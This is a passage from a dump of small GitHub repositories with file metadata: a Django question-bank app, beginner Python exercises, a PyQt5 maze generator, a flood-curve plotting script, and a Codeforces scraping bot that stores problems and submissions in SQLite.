LessonManager(models.Manager):\n def create_lesson(self, user, title, text, subject=None):\n new_lesson = self.model(title=title, creator=user, lesson_text=text,\n date=datetime.today())\n new_lesson.save()\n return new_lesson\n\n\nclass Lesson(models.Model):\n title = models.CharField(max_length=64, 
default=\"\")\n lesson_text = models.TextField()\n date = models.DateTimeField(editable=False)\n\n def __str__(self):\n return self.title[:50]\n\n def save(self):\n if not self.id:\n self.date = datetime.today()\n super(Lesson, self).save()" }, { "alpha_fraction": 0.8235294222831726, "alphanum_fraction": 0.8235294222831726, "avg_line_length": 29, "blob_id": "1f0fe95185fac288e6fe3cf1f8abea3972b3ea47", "content_id": "e8f926726f703e64fdb9999bf2ff8b91618e6d37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 119, "license_type": "no_license", "max_line_length": 46, "num_lines": 4, "path": "/discussions/admin.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom discussions.models import Thread, Comment\n\nadmin.site.register([Thread, Comment])" }, { "alpha_fraction": 0.722347617149353, "alphanum_fraction": 0.7358916401863098, "avg_line_length": 33.153846740722656, "blob_id": "84813ecf07c8a6ab2d32556c558e6369bfa540c4", "content_id": "bc8982089e843504600b4135e18f329d6efe6999", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 443, "license_type": "no_license", "max_line_length": 79, "num_lines": 13, "path": "/questions/views.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, get_object_or_404\nfrom questions.models import Question\n\n\ndef index(request):\n all_questions = Question.objects.all()\n context = {'question_list': all_questions}\n return render(request, 'questions/index.html', context)\n\n\ndef question_template(request, question_id):\n q = get_object_or_404(Question, id=question_id)\n return render(request, 'questions/question_template.html', {'question': q})" }, { "alpha_fraction": 0.7036144733428955, "alphanum_fraction": 0.7180722951889038, "avg_line_length": 31, "blob_id": "59e11b9612665fc2d50d031d0fcea868dc198e72", "content_id": "cedd53d7102a0f8fe7dc2b20cb02b255e6993140", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 415, "license_type": "no_license", "max_line_length": 73, "num_lines": 13, "path": "/lessons/views.py", "repo_name": "herougo/QuestionBank", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, get_object_or_404\nfrom lessons.models import Lesson\n\n\ndef index(request):\n all_lessons = Lesson.objects.all()\n context = {'lesson_list': all_lessons}\n return render(request, 'lessons/index.html', context)\n\n\ndef lesson_template(request, lesson_id):\n l = get_object_or_404(Lesson, id=lesson_id)\n return render(request, 'lessons/lesson_template.html', {'lesson': l})" } ]
17
Altahoma/python-learn
https://github.com/Altahoma/python-learn
340246ffd63f2c9f51b55b5535d321c1a1513437
0d3677f0a11de8428baa2b83746d2fc3437c2c6a
001b29a1c92cae4875ae128194d9177608ff73a9
refs/heads/master
2020-05-19T20:29:07.516655
2019-05-12T12:13:53
2019-05-12T12:13:53
185,202,286
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7702702879905701, "alphanum_fraction": 0.7770270109176636, "avg_line_length": 18.34782600402832, "blob_id": "fb2e6da32f6f7389fb0f2287859e91cf91692fc3", "content_id": "9caa951ddf6b6a53253d08b6de4d2c66158ff823", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 444, "license_type": "no_license", "max_line_length": 46, "num_lines": 23, "path": "/motorcycles.py", "repo_name": "Altahoma/python-learn", "src_encoding": "UTF-8", "text": "motorcycles = ['honda', 'yamaha', 'suzuki']\nprint(motorcycles)\n\nmotorcycles.append('ducati')\nprint(motorcycles)\n\nmotorcycles.insert(0, 'bmw')\nprint(motorcycles)\n\ndel motorcycles[2]\nprint(motorcycles)\n\npoped_motorcycle = motorcycles.pop()\nprint(motorcycles)\nprint(poped_motorcycle)\n\nlast_owned = motorcycles.pop(-1)\nprint(motorcycles)\nprint(last_owned)\n\nremoved_motorcycle = motorcycles.remove('bmw')\nprint(motorcycles)\nprint(removed_motorcycle)" }, { "alpha_fraction": 0.6909090876579285, "alphanum_fraction": 0.6909090876579285, "avg_line_length": 55, "blob_id": "06ca741528db1515229363905902a9b92d413e13", "content_id": "f10ba6f184d5c4f9e2fdaee9d38076c9dc7349e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 55, "license_type": "no_license", "max_line_length": 55, "num_lines": 1, "path": "/language_list.py", "repo_name": "Altahoma/python-learn", "src_encoding": "UTF-8", "text": "print(\"Language:\\n\\tC\\n\\tC++\\n\\tJava\\n\\tPHP\\n\\tPython\")" }, { "alpha_fraction": 0.6352583765983582, "alphanum_fraction": 0.6352583765983582, "avg_line_length": 35.55555725097656, "blob_id": "36303be9870f7bea88dae7664cc4e9084a6b7c85", "content_id": "fb7b8c81b8c6c59a27bb0297d4eda1ad30ebc9a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 329, "license_type": "no_license", "max_line_length": 71, "num_lines": 9, "path": "/pets.py", "repo_name": "Altahoma/python-learn", "src_encoding": "UTF-8", "text": "def describe_pet(pet_name, animal_type='dog'):\n print(\"\\nI have a \" + animal_type + \".\")\n print(\"My \" + animal_type + \"'s name is \" + pet_name.title() + \".\")\n\n\ndescribe_pet('hamster', 'harry')\ndescribe_pet(animal_type='dog', pet_name='willie')\ndescribe_pet(pet_name='tomas', animal_type='cat')\ndescribe_pet(pet_name='Gav')\n" }, { "alpha_fraction": 0.6555555462837219, "alphanum_fraction": 0.6555555462837219, "avg_line_length": 20.235294342041016, "blob_id": "2df1be9d26738f40ef0f99361d2e08260cbb0e49", "content_id": "f788c0f7480d379ebf9d9efea2b8ab583ea2d04a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 360, "license_type": "no_license", "max_line_length": 42, "num_lines": 17, "path": "/file_reader.py", "repo_name": "Altahoma/python-learn", "src_encoding": "UTF-8", "text": "with open('pi_digits.txt') as file_object:\n content = file_object.read()\n print(content)\n print()\n\nfilename = 'pi_digits.txt'\n\nwith open(filename) as file_object:\n for line in file_object:\n print(line.rstrip())\n print()\n\nwith open(filename) as file_object:\n lines = file_object.readlines()\n\nfor line in lines:\n print(line.rstrip())" }, { "alpha_fraction": 0.7052023410797119, "alphanum_fraction": 0.7052023410797119, "avg_line_length": 27.83333396911621, "blob_id": "d8076f370cd9a3fcd6ae53ac46e8936da308432a", "content_id": "d2bdf65aa1c1c7c7e3792965b340ada245be7558", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 346, "license_type": "no_license", "max_line_length": 78, "num_lines": 12, "path": "/favorite_languages.py", "repo_name": "Altahoma/python-learn", "src_encoding": "UTF-8", "text": "from collections import OrderedDict\n\n\nfavorite_language = OrderedDict()\n\nfavorite_language['jen'] = 'python'\nfavorite_language['sarah'] = 'c'\nfavorite_language['edward'] = 'ruby'\nfavorite_language['phil'] = 'python'\n\nfor name, languages in favorite_language.items():\n print(name.title() + \"'s favorite language is \" + languages.title() + \".\")\n" }, { "alpha_fraction": 0.6428571343421936, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 27.5, "blob_id": "fb2c320af279300bcfacbb08db7e54ad608ae1d5", "content_id": "aa30662c0c1c5de7c743b386392c5f2680e94c5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56, "license_type": "no_license", "max_line_length": 36, "num_lines": 2, "path": "/even_numbers.py", "repo_name": "Altahoma/python-learn", "src_encoding": "UTF-8", "text": "even_numbers = list(range(0, 11, 2))\nprint(even_numbers)" }, { "alpha_fraction": 0.6060606241226196, "alphanum_fraction": 0.7196969985961914, "avg_line_length": 17.85714340209961, "blob_id": "0e348442a6accf9e52be9e51f217e1d37b48ec19", "content_id": "fb72ffe2f4cfb9ee78369b7e5cd1c271c7e72158", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 132, "license_type": "no_license", "max_line_length": 23, "num_lines": 7, "path": "/dimensions.py", "repo_name": "Altahoma/python-learn", "src_encoding": "UTF-8", "text": "dimensions = (200, 50)\nprint(dimensions[0])\nprint(dimensions[1])\n\ndimensions = (150, 150)\nprint(dimensions[0])\nprint(dimensions[1])\n" } ]
7
ransaked1/MazeMaker
https://github.com/ransaked1/MazeMaker
bb33f7a539f8679677dff3cb431b11061af7b62c
69ffb3fd273e38764f59f1d5d41a14fbec396d4c
625dde4dff604eeff3bf5656009bf78e9226af28
refs/heads/master
2022-05-28T04:42:06.540898
2020-05-02T10:54:26
2020-05-02T10:54:26
260,662,797
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5107104778289795, "alphanum_fraction": 0.5312590599060059, "avg_line_length": 33.97288131713867, "blob_id": "698cd9c438d5de9b08cffebf89639e40ef657cb2", "content_id": "6622c9e357c259b41756b97efaa16ed77521be7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10317, "license_type": "no_license", "max_line_length": 96, "num_lines": 295, "path": "/mazemaker.py", "repo_name": "ransaked1/MazeMaker", "src_encoding": "UTF-8", "text": "import sys\nimport random\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\n#defining values for each direction in the maze\nN,S,E,W = 1,2,4,8\n\n#defining macro to reverse directions\nREVERSE = {E: W, W: E, N: S, S: N}\n\n#GUI object for the app\nclass MazeMakerGUI(QWidget):\n\n def __init__(self):\n super(MazeMakerGUI, self).__init__()\n\n #initializing variables and setting recursion limit\n self.mazeHeight = 0\n self.mazeWidth = 0\n \n sys.setrecursionlimit(35 * 45)\n\n self.maze = list(list(0 for i in range(self.mazeWidth)) for j in range(self.mazeHeight))\n\n #initializing UI\n self.initUI()\n\n #drawing the GUI and maze\n def paintEvent(self, event):\n\n #initializing the painter and fonts\n qp = QPainter()\n qp.begin(gui)\n pen = QPen(Qt.black, 3, Qt.SolidLine)\n qp.setPen(pen)\n qp.setFont(QFont('Decorative', 22))\n \n qp.drawText(868, 86, \"x\")\n\n #drawing the box around the maze output\n qp.drawLine(55, 615, 55, 55)\n qp.drawLine(780, 615, 780, 55)\n qp.drawLine(55, 53, 780, 53)\n qp.drawLine(55, 615, 780, 615)\n\n\n #drawing the maze\n drawWidth = 80\n drawHeight = 70\n #drawing the top line\n for i in range(self.mazeWidth):\n qp.drawLine(drawWidth,drawHeight,drawWidth + 15,drawHeight)\n drawWidth += 15\n #drawing the rest of the maze\n for j in range(self.mazeHeight):\n drawWidth = 80\n drawHeight += 15\n #drawing the left wall of the maze\n if j != 0:\n qp.drawLine(drawWidth, drawHeight, drawWidth, drawHeight - 15)\n for i in range(self.mazeWidth ):\n #leave gap if there is no wall to the south else draw south most wall \n if self.maze[j][i] & S != 0:\n drawWidth += 15\n else:\n qp.drawLine(drawWidth,drawHeight,drawWidth + 15,drawHeight)\n drawWidth += 15\n #don't do anything if at the west most wall\n if self.maze[j][i] & E != 0 and i + 1 < self.mazeWidth:\n if (self.maze[j][i] | self.maze[j][i+1]) & S == 0:\n drawWidth += 0\n #don't draw to the west if at exit\n elif (i == self.mazeWidth-1) & (j == self.mazeHeight-1):\n drawWidth += 15\n #draw wall to the west\n else:\n qp.drawLine(drawWidth, drawHeight, drawWidth, drawHeight - 15)\n\n qp.end()\n \n\n #generating the UI\n def initUI(self):\n\n #initializing app window\n self.setGeometry(30, 30, 980, 670)\n self.setWindowTitle('Maze Maker')\n\n #initializing boxes for maze size input\n self.boxWidth = QLineEdit(self)\n self.boxWidth.move(830, 70)\n self.boxWidth.resize(30,20)\n\n self.boxHeight = QLineEdit(self)\n self.boxHeight.move(890, 70)\n self.boxHeight.resize(30,20)\n\n #initializing button for maze generation\n self.generateButton = QPushButton('Generate maze with RecB', self)\n self.generateButton.move(817,100)\n\n self.generateButton1 = QPushButton('Generate maze with HnK', self)\n self.generateButton1.move(819,130)\n\n self.generateButton.clicked.connect(self.on_click)\n self.generateButton1.clicked.connect(self.on_click1)\n\n #drawing all the UI components\n self.show()\n\n def on_click(self):\n #checking input\n inputWidth = self.boxWidth.text()\n inputHeight = 
self.boxHeight.text()\n \n try:\n self.mazeWidth = int(inputWidth)\n self.mazeHeight = int(inputHeight)\n except:\n QMessageBox.about(self, 'Error','Maze size input can only be a number')\n return\n pass\n\n if (self.mazeWidth > 45 or self.mazeHeight > 35):\n QMessageBox.about(self, 'Error','Maze size has to be less than 45 x 35')\n return\n\n if (self.mazeWidth < 3 and self.mazeHeight < 3):\n QMessageBox.about(self, 'Error','Maze size has to be more than 2 x 3 or 3 x 2')\n return\n\n #generating bidimensional array for the maze and building it\n self.maze = list(list(0 for i in range(self.mazeWidth)) for j in range(self.mazeHeight))\n self.buildMazeRecBack(0, 0)\n\n #updating the screen\n self.update()\n\n def on_click1(self):\n #checking input\n inputWidth = self.boxWidth.text()\n inputHeight = self.boxHeight.text()\n \n try:\n self.mazeWidth = int(inputWidth)\n self.mazeHeight = int(inputHeight)\n except:\n QMessageBox.about(self, 'Error','Maze size input can only be a number')\n return\n pass\n\n if (self.mazeWidth > 45 or self.mazeHeight > 35):\n QMessageBox.about(self, 'Error','Maze size has to be less than 45 x 35')\n return\n\n if (self.mazeWidth < 3 and self.mazeHeight < 3):\n QMessageBox.about(self, 'Error','Maze size has to be more than 2 x 3 or 3 x 2')\n return\n\n #generating bidimensional array for the maze and building it\n self.maze = list(list(0 for i in range(self.mazeWidth)) for j in range(self.mazeHeight))\n\n #Hunt and kill driver code\n y = 0\n x = 0\n while x != -1:\n started = 1\n while 1:\n try: \n y, x = self.walk(y,x, started)\n started = 0\n except:\n break\n x, y = self.hunt()\n\n #updating the screen\n self.update()\n\n #Recursive backtracking algorithm\n def buildMazeRecBack(self, originX, originY):\n #generate rendom list of all 4 directions\n directions = random.sample([N,S,E,W], 4)\n\n #loop through the list\n for direction in directions:\n #convert direction into maze coordinates\n if direction == S:\n nextX, nextY = originX, originY + 1\n elif direction == N:\n nextX, nextY = originX, originY - 1\n elif direction == E:\n nextX, nextY = originX + 1, originY\n else:\n nextX, nextY = originX - 1, originY\n\n #check if there is a cell to go to and break the wall there\n if nextY in range(self.mazeHeight) and\\\n (nextX in range(self.mazeWidth)) and\\\n self.maze[nextY][nextX] == 0:\n self.maze[originY][originX] |= direction\n self.maze[nextY][nextX] |= REVERSE[direction]\n #do that recursively\n self.buildMazeRecBack(nextX, nextY)\n\n #Walk routine for Hunt and Kill\n def walk(self, originX, originY, started):\n #generate rendom list of all 4 directions\n directions = random.sample([N,S,E,W], 4)\n\n #if first call after a hunt routine connect the maze to a random visited cell nearby\n if started == 1:\n for direction in directions:\n #convert direction into maze coordinates\n if direction == S:\n nextX, nextY = originX, originY + 1\n elif direction == N:\n nextX, nextY = originX, originY - 1\n elif direction == E:\n nextX, nextY = originX + 1, originY\n else:\n nextX, nextY = originX - 1, originY\n\n if nextY in range(self.mazeHeight) and\\\n nextX in range(self.mazeWidth) and self.maze[nextY][nextX] != 0:\n self.maze[originY][originX] |= direction\n self.maze[nextY][nextX] |= REVERSE[direction]\n break\n \n #go to a random unvisited cell and return its coordinates \n for direction in directions:\n #convert direction into maze coordinates\n if direction == S:\n nextX, nextY = originX, originY + 1\n elif direction == N:\n nextX, nextY = originX, originY - 1\n 
elif direction == E:\n nextX, nextY = originX + 1, originY\n else:\n nextX, nextY = originX - 1, originY\n \n if nextY in range(self.mazeHeight) and\\\n nextX in range(self.mazeWidth) and self.maze[nextY][nextX] == 0:\n self.maze[originY][originX] |= direction\n self.maze[nextY][nextX] |= REVERSE[direction]\n return nextX, nextY\n\n #Hunt routine for Hunt and Kill\n def hunt(self):\n #iterate through the maze and return an unvisited cell\n for i in range(self.mazeHeight):\n for j in range(self.mazeWidth):\n if self.maze[i][j] == 0:\n return i, j\n # return -1, -1 if all cell are visited\n return -1, -1\n\n\n #Utilitarian blocks to print maze values and draw the maze in the terminal\n def printMaze(self):\n for i in range(self.mazeHeight):\n print ('\\n')\n for j in range(self.mazeWidth):\n print(self.maze[i][j], end=' ')\n print('\\n')\n\n def draw(self):\n print(\"_\" * (self.mazeWidth * 2))\n for j in range(self.mazeHeight):\n if j!=0:\n print(\"|\", end='')\n else:\n print (\"_\", end='')\n for i in range(self.mazeWidth):\n if (self.maze[j][i] & S != 0):\n print(\" \", end='')\n else:\n print(\"_\", end='')\n if self.maze[j][i] & E != 0 and i + 1 < self.mazeWidth:\n if ((self.maze[j][i] | self.maze[j][i+1]) & S != 0):\n print(\" \", end='')\n else:\n print(\"_\", end='')\n elif (i==self.mazeWidth-1) & (j==self.mazeHeight-1):\n print(\"_\", end='')\n else:\n print(\"|\", end='')\n print(\"\")\n\n#Create App and GUI Objects and connect to the system\napp = QApplication(sys.argv)\ngui = MazeMakerGUI()\nsys.exit(app.exec_())\n" }, { "alpha_fraction": 0.7200000286102295, "alphanum_fraction": 0.7446808218955994, "avg_line_length": 26.325580596923828, "blob_id": "42121d511849980c473e1fdfb02fb5f9513c6925", "content_id": "334d76dc5dc10e25a355f897b004bb00597bdbc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1175, "license_type": "no_license", "max_line_length": 260, "num_lines": 43, "path": "/README.md", "repo_name": "ransaked1/MazeMaker", "src_encoding": "UTF-8", "text": "# MazeMaker\nSimple maze generator with Recursive Backtracking and Hunt and Kill algorithms in Python using PyQt5\n\n <img src=\"https://github.com/ransaked1/MazeGenerator/blob/master/MazeMaker.png\" width=\"490\" height=\"350\">\n\n## Getting Started\n\n### Prerequisites\n\nMake sure you have python3 installed:\n```\nsudo apt-get install python3\n```\n\nTo install PyQt5 type:\n```\nsudo apt-get install python3-pyqt5\nsudo apt-get install pyqt5-dev-tools\nsudo apt-get install qttools5-dev-tools\n```\n\n## Running the program\nIn root folder run:\n```\npython3 mazemaker.py\n```\n\n### Potential Issues\n* PyQt5 uses the X11 server for display. If you are running the app on a Windows 10 Ubuntu Subsystem, you will need to download and setup Xming in Windows: https://xming.en.softonic.com/. Then export the window path in your Ubuntu environment and run the game:\n```\nexport DISPLAY=:0.0\n```\n* If the game won't open on your Linux or MacOS machine you may be missing the X11 server packages. You can download them by typing:\n```\nsudo apt-get install xorg openbox\n```\nAnd export the windows path:\n```\nexport DISPLAY=:0.0\n```\n\n## Built With\n* [PyQt5](https://pypi.org/project/PyQt5/) - Cross-platform GUI\n" } ]
2
saludes/2010flood
https://github.com/saludes/2010flood
6e3bd5aa7e869fee061023845f7a0baf48843fe9
03ded64517e013c63307836d99e7b22e4bc3394d
bf08e2b8198b0851ce3e482496ac012283edf8a9
refs/heads/master
2016-09-05T23:21:39.019264
2011-09-14T09:38:37
2011-09-14T09:38:37
1,765,342
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.559476375579834, "alphanum_fraction": 0.615822434425354, "avg_line_length": 24.114286422729492, "blob_id": "f3847e3db00a92989eecb237556447d80293ef27", "content_id": "63ed06e1d5933dfdab3b4fd06437e50dfd6d977b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1757, "license_type": "no_license", "max_line_length": 77, "num_lines": 70, "path": "/rayleigh.py", "repo_name": "saludes/2010flood", "src_encoding": "UTF-8", "text": "from numpy import *\nimport sys\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\nmode= 'save'\nN = 100\nM = 1000\ns = tm = 10\na = -10\nb = 100\n\n# http://en.wikipedia.org/wiki/Rayleigh_distribution\n# cumulative distribution: 1-exp(-x^2/(2*sigma**2))\nray = lambda t,sigma=1: t>0 and t/sigma**2*exp(-t**2/(2*sigma**2)) or 0.\npray = lambda t,sigma=1: t>0 and 1 - exp(-t**2/2/sigma**2) or 0.\n\n\nts = linspace(a,b,M)\nqs = array([1 + 40*ray(t,tm) for t in ts])\ntqs = array([ts,qs]).transpose()\nqmax = max(qs)\nqmin = min(qs)\ntmax = ts[argmax(qs)]\nprint \"qmax =\",qmax, \" at tmax =\", tmax\ntqs1 = tqs[ts<tmax,:]\ntqs2 = tqs[ts>tmax,:]\n\nassert all(diff(tqs1[:,1])>=0), \"Not increasing\"\nassert all(diff(tqs2[:,1])<=0), \"Not decreasing\"\n\n# Inverse interpolation to find t_{-+}(q)\nundef = NaN\nt1 = lambda q: interp(q, tqs1[:,1], tqs1[:,0],left=undef, right=undef)\nt2 = lambda q: interp(q, tqs2[::-1,1], tqs2[::-1,0], left=undef, right=undef)\n\nys = linspace(0,qmax,N)[:-1]\ndq = ys[1]-ys[0]\ndt = t2(ys)-t1(ys)\n#print dt\n#assert all(dt>=0), \"Negative dt\"\n#assert all(logical_or(isnan(diff(dt)), diff(dt)<=0)), \"Non decreasing dt\"\nvy = cumsum(dq*dt[::-1]) # Start at the top\n\nfg = plt.figure(1)\nax1 = fg.add_subplot(121)\nax2 = fg.add_subplot(122)\nax1.plot(ys[::-1],vy,'b-')\n\nW = 22.\nqf = interp(W,vy,ys[::-1])\nprint \"W = \", W\nprint \"Qf = \", qf\nprint \"t1,t2 = \", t1(qf), t2(qf)\npq = tuple([t + 40*pray(t,tm) for t in (t1(qf),t2(qf))])\nprint \"cumulative difference =\",pq[1] - pq[0], (t2(qf) - t1(qf))*qf + W \nax1.plot([1,qf,qf],[W,W,0],'g:')\nax2.plot(ts,qs,'b-')\nax2.plot([a,b],[qf,qf],'r:')\nfcolor = 'cyan'\nax2.fill_between(ts,qs,qf,where=qs>qf,facecolor=fcolor,color=fcolor)\nax2.axis([a,b,0,5])\n\n\n\nif mode == 'save':\n\tfg.savefig('cut.pdf')\nelse:\n\tplt.show()" }, { "alpha_fraction": 0.6861313581466675, "alphanum_fraction": 0.7007299065589905, "avg_line_length": 16.1875, "blob_id": "1aaabb32e120549e9c25deab0c66dde49e316076", "content_id": "3cf6d339b65f254efe7e17872f7e37d71ae05638", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 274, "license_type": "no_license", "max_line_length": 84, "num_lines": 16, "path": "/README.md", "repo_name": "saludes/2010flood", "src_encoding": "UTF-8", "text": "## How to view it\n\nGo to file `flood.pdf` and click _View Raw_.\n\n## How to make it\n\n> latex flood\n\n## File organization\n\n`flood.tex` is the main LaTeX file but the bulk of the paper is inside `answer.tex`.\n\n\n## To do\n\nVisit the Wiki https://github.com/saludes/2010flood/wiki" }, { "alpha_fraction": 0.6875, "alphanum_fraction": 0.6988636255264282, "avg_line_length": 12.538461685180664, "blob_id": "18cec95aa26582d3969b7ff835f9354903646d94", "content_id": "6b23a68cc71780cb151c8c5dc44b057dfd9e3441", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 176, "license_type": "no_license", "max_line_length": 41, "num_lines": 13, 
"path": "/Makefile", "repo_name": "saludes/2010flood", "src_encoding": "UTF-8", "text": "IMAGES = cut.pdf\nflood.pdf: flood.tex answer.tex ${IMAGES}\n\tpdflatex flood\n\ncut.pdf: rayleigh.py\n\tpython2.6 $^\n\nclean:\n\trm -f cut.pdf \n\ndistclean:\n\tmake clean\n\trm -f flood.pdf\n" } ]
3
lissrbay/codeforces_bot
https://github.com/lissrbay/codeforces_bot
925adf28c70d06c7597e77990d37e821028a6cb5
cc00da63d4c6e2ae9b5554224cd111a1d5dc37b4
b5733e309a1b4cfc5a683ef9ed4aced2f716ba66
refs/heads/master
2021-09-02T13:40:42.429158
2018-01-03T00:26:46
2018-01-03T00:26:46
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5163999199867249, "alphanum_fraction": 0.529710054397583, "avg_line_length": 39.20382308959961, "blob_id": "6e81290ca74a3906ab92fa8f134c5c1c9f13d232", "content_id": "ca9a26b0d98331709f578e9e3b1db6cdf8f1e53a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6311, "license_type": "no_license", "max_line_length": 123, "num_lines": 157, "path": "/bases/update.py", "repo_name": "lissrbay/codeforces_bot", "src_encoding": "UTF-8", "text": "import requests\nimport sqlite3\nimport os\nfrom bs4 import BeautifulSoup\n\ndef cf_update():\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\settings.db\")\n cursor = settings.cursor()\n cursor.execute(\"select * from last_update_problemset\")\n x = cursor.fetchone()\n\n last_try = x[0]\n\n url = 'http://codeforces.com/problemset/'\n r = requests.get(url)\n max_page = 0\n available_tags = {'math', \"strings\", \"trees\", \"graphs\", \"dp\", \"greedy\"}\n soup = BeautifulSoup(r.text, \"lxml\")\n base = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\cf.db\")\n conn = base.cursor()\n\n for link in soup.find_all(attrs={\"class\" : \"page-index\"}):\n s = link.find('a')\n s2 = s.get(\"href\").split('/')\n max_page = max(max_page, int(s2[3]))\n\n a = ''\n b = 0\n f = False\n last_update = last_try\n for i in range(1, max_page + 1):\n r = requests.get('http://codeforces.com/problemset/' + '/page/' + str(i))\n soup = BeautifulSoup(r.text, \"lxml\")\n old = ''\n v = False\n for link in soup.find_all('a'):\n s = link.get('href')\n if s != None and s.find('/problemset') != -1:\n s = s.split('/')\n if len(s) == 5 and old != s[3] + s[4]:\n if s[3] + s[4] == last_try:\n v = True\n break\n a = s[3]\n b = s[4]\n old = s[3] + s[4]\n if not f:\n f = True\n last_update = old\n conn.execute(\"insert into problems values (?, ?)\", (a, b))\n if len(s) == 4 and s[3] in available_tags:\n conn.execute(\"insert into ? values (?, ?)\", (s[3], a, b))\n\n if v:\n break\n\n\n base.commit()\n base.close()\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"update last_update_problemset set problem = ? where problem = ?\", (str(last_update), str(last_try)))\n settings.commit()\n settings.close()\n\ndef update_user(username, chat_id, last_update):\n conn = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\users\\\\\" + username + '.db')\n conn2 = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + '\\\\cf.db')\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\settings.db\")\n cursor = conn.cursor()\n cursor2 = conn2.cursor()\n cursor_settings = settings.cursor()\n cursor_settings.execute(\"select last_problem from users where chat_id = ?\", (str(chat_id), ))\n update_eq = cursor_settings.fetchone()\n cursor_settings.execute(\"select * from last_update_problemset\")\n update_base = cursor_settings.fetchone()\n last_problem = update_base[0]\n if update_eq[0] != update_base[0]:\n cursor2.execute(\"SELECT * FROM problems\")\n x = cursor2.fetchone()\n while x != None:\n cursor.execute(\"select * from result where problem = ? and diff = ?\", (str(x[0]), str(x[1])))\n x2 = cursor.fetchone()\n if x2 == None:\n cursor.execute(\"insert into result values (?, ?, ? 
)\", (x[0], x[1], \"NULL\"))\n last_problem = x\n x = cursor2.fetchone()\n conn2.close()\n settings.close()\n if len(last_problem) == 2:\n last_problem = last_problem[0] + last_problem[1]\n\n url = 'http://codeforces.com/submissions/' + username\n r = requests.get(url)\n max_page = 1\n soup = BeautifulSoup(r.text, \"lxml\")\n\n for link in soup.find_all(attrs={\"class\": \"page-index\"}):\n s = link.find('a')\n s2 = s.get(\"href\").split('/')\n max_page = max(max_page, int(s2[4]))\n\n v = False\n r = requests.get('http://codeforces.com/submissions/' + username + '/page/0')\n soup = BeautifulSoup(r.text, \"lxml\")\n last_try_new = soup.find(attrs={\"class\": \"status-small\"})\n last_try_new = str(last_try_new).split()\n last_try_new = str(last_try_new[2]) + str(last_try_new[3])\n for i in range(1, max_page + 1):\n r = requests.get('http://codeforces.com/submissions/' + username + '/page/' + str(i))\n soup = BeautifulSoup(r.text, \"lxml\")\n count = 0\n j = 0\n ver = soup.find_all(attrs={\"class\": \"submissionVerdictWrapper\"})\n last_try = soup.find_all(attrs={\"class\": \"status-small\"})\n for link in soup.find_all('a'):\n last_try_date = str(last_try[j]).split()\n last_try_date = str(last_try_date[2]) + str(last_try_date[3])\n if last_try_date == last_update:\n v = True\n break\n s = link.get('href')\n if s != None and s.find('/problemset') != -1:\n s = s.split('/')\n if len(s) == 5:\n s2 = str(ver[count]).split()\n s2 = s2[5].split('\\\"')\n count += 1\n j += 1\n cursor.execute(\"select * from result where problem = ? and diff = ?\", (s[3], s[4]))\n x = cursor.fetchone()\n if s2[1] == 'OK' and x != None:\n cursor.execute(\"update result set verdict = ? where problem = ? and diff = ?\", (s2[1], s[3], s[4]))\n if x[2] != 'OK':\n cursor.execute(\"update result set verdict = ? where problem = ? and diff = ?\", (s2[1], s[3], s[4]))\n if v:\n break\n\n conn.commit()\n conn.close()\n\n settings = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\settings.db\")\n conn = settings.cursor()\n conn.execute(\"update users set username = ? where chat_id = ?\", (str(username), str(chat_id)))\n conn.execute(\"update users set last_update = ? where chat_id = ?\", (str(last_try_new), str(chat_id)))\n conn.execute(\"update users set last_problem = ? where chat_id = ?\", (str(last_problem), str(chat_id)))\n\n settings.commit()\n settings.close()\n\n\ndef update_theory_base(tag, link):\n theory = sqlite3.connect(os.path.abspath(os.path.dirname(__file__)) + \"\\\\theory.db\")\n conn = theory.cursor()\n conn.execute(\"insert into ? 
